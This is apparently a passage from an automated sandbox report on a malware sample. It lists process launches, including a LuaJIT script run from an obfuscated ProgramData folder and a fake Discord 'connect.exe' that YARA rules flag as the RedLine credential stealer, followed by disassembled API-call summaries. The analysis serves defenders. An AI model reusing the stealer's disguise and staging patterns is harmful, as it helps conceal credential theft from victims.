                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:15:35:10
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:15:35:12
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
                                                                                                                                                                      Imagebase:0x7ff6fdfd0000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:15:35:22
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                                                                                                                                                                      Imagebase:0x7ff738a30000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:15:35:30
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                                                                                                                                                                      Imagebase:0x7ff738a30000
                                                                                                                                                                      File size:1'159'168 bytes
                                                                                                                                                                      MD5 hash:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:15:35:51
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1'074'015'689 bytes
                                                                                                                                                                      MD5 hash:ADF3C225DDD9EEB90009F892A9A83D1B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:15:35:52
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true


                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:31.2%
                                                                                                                                                                        Total number of Nodes:320
                                                                                                                                                                        Total number of Limit Nodes:7

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00F3549C
                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00F3551D
                                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00F35601
                                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00F35637
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F3567C
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F35685
                                                                                                                                                                        • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00F35688
                                                                                                                                                                        • AllowSetForegroundWindow.USER32(00000000), ref: 00F3568B
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F356AB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F356AE
                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00F356CA
                                                                                                                                                                        • EnumWindows.USER32(00F35830,?), ref: 00F356DF
                                                                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 00F356F4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00F35711
                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00F3571B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                                                                                                                                        • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                        • API String ID: 185584925-2796270252
                                                                                                                                                                        • Opcode ID: 7de50ba8618686ecb7478f0722374a412918afdaeb6f5d1a17de9784da484436
                                                                                                                                                                        • Instruction ID: 134e8194bf6eb0830a57a0c6096559fc7859f377738eb5afaaac82be27b5d48d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7de50ba8618686ecb7478f0722374a412918afdaeb6f5d1a17de9784da484436
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DE1D171E00A099BCF14EFA8CC85BAEB7B5AF84B30F544129E815EB291E7349D41EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F36AC8
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00F36AD5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F36AF5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                                        • String ID: S-1-5-18
                                                                                                                                                                        • API String ID: 4052875653-4289277601
                                                                                                                                                                        • Opcode ID: 85e7d0ca11b6dba37a99de6fc829f93296bc20a9477d0b4aadeb35ab76b33fba
                                                                                                                                                                        • Instruction ID: 6b5a88930235a78f9822cf3937a1adfa5b6790a48c98dca47f0d90926c76d5fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 85e7d0ca11b6dba37a99de6fc829f93296bc20a9477d0b4aadeb35ab76b33fba
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D02AE71D00249EFDF14DFA4C9557AEBBB5EF45324F148258E802EB285EB34AE05EB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,72A902E8,?,-00000010), ref: 00F357D0
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00F3580C
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F35822
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 215268677-0
                                                                                                                                                                        • Opcode ID: 4c4822466db6804b2690ddf5c0807123b41f09ac30400ebf6adc3fac2c60234b
                                                                                                                                                                        • Instruction ID: fd7409310ae79afb9092f6282b4e850dd5f0d2d674101d9897baf096793ae507
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c4822466db6804b2690ddf5c0807123b41f09ac30400ebf6adc3fac2c60234b
                                                                                                                                                                        • Instruction Fuzzy Hash: 84F03674148305AFEB10AF10EC45B9A7BE8FB84710F508819FD84C2160D379955CEB63
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32(72A902E8,?,?,?,?,?,?,?,?,?,00F756D5,000000FF), ref: 00F3CDE8
                                                                                                                                                                          • Part of subcall function 00F31F80: LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00F34251,72A902E8,00000000,?,00000000,?,?,?,00F74400,000000FF,?), ref: 00F31F9D
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00F3CEB1
                                                                                                                                                                          • Part of subcall function 00F36600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                        • String ID: Full command line:
                                                                                                                                                                        • API String ID: 1878577176-831861440
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 289 f35e40-f35ebc GetTokenInformation 290 f35f20-f35f33 289->290 291 f35ebe-f35ec7 GetLastError 289->291 291->290 292 f35ec9-f35ed7 291->292 293 f35ed9-f35edc 292->293 294 f35ede 292->294 295 f35f0b 293->295 296 f35ee0-f35ee7 294->296 297 f35f0e-f35f1a GetTokenInformation 294->297 295->297 298 f35ef7-f35f08 call f54080 296->298 299 f35ee9-f35ef5 call f360d0 296->299 297->290 298->295 299->297
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00F35E18,72A902E8,?), ref: 00F35EB4
                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00F35E18,72A902E8,?), ref: 00F35EBE
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00F35E18,72A902E8,?), ref: 00F35F1A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2567405617-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 304 f670bb-f670c6 305 f670d4-f670da 304->305 306 f670c8-f670d2 304->306 308 f670f3-f67104 RtlAllocateHeap 305->308 309 f670dc-f670dd 305->309 306->305 307 f67108-f67113 call f57370 306->307 313 f67115-f67117 307->313 310 f67106 308->310 311 f670df-f670e6 call f65245 308->311 309->308 310->313 311->307 317 f670e8-f670f1 call f6bf83 311->317 317->307 317->308
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00F6596A,00000001,00000364,?,00000006,000000FF,?,00F56CE7,00000000,00F63841,00000000), ref: 00F670FC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 320 f35940-f3596f 321 f35971-f3597f 320->321 322 f3598f-f359a0 320->322 323 f35981-f35982 FindCloseChangeNotification 321->323 324 f35988 321->324 323->324 324->322
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,72A902E8,00000000,?,?,?), ref: 00F35982
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 325 f31f80-f31faf LocalAlloc
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00F34251,72A902E8,00000000,?,00000000,?,?,?,00F74400,000000FF,?), ref: 00F31F9D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F357C0: GetCurrentProcess.KERNEL32(00000008,?,72A902E8,?,-00000010), ref: 00F357D0
                                                                                                                                                                          • Part of subcall function 00F357C0: OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F34C15
                                                                                                                                                                        • CoCreateInstance.OLE32(00F772B0,00000000,00000004,00F85104,00000000,?), ref: 00F34C45
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F35187
                                                                                                                                                                        • _com_issue_error.COMSUPP ref: 00F351B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 928366108-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00F3CBB6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00F8E6D0,00000800), ref: 00F3CBD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenQueryValue
                                                                                                                                                                        • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                        • API String ID: 4153817207-482544602
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6DEE5
                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?), ref: 00F6DF10
                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00F6DFA4
                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00F6DFB2
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F6E073
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                        • API String ID: 4147378913-905460609
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F338CB
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F3390B
                                                                                                                                                                        • Process32FirstW.KERNEL32(?,00000000), ref: 00F3395F
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F3397A
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F33A8E
                                                                                                                                                                        • Process32NextW.KERNEL32(?,00000000), ref: 00F33AA2
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F33AF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 708755948-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
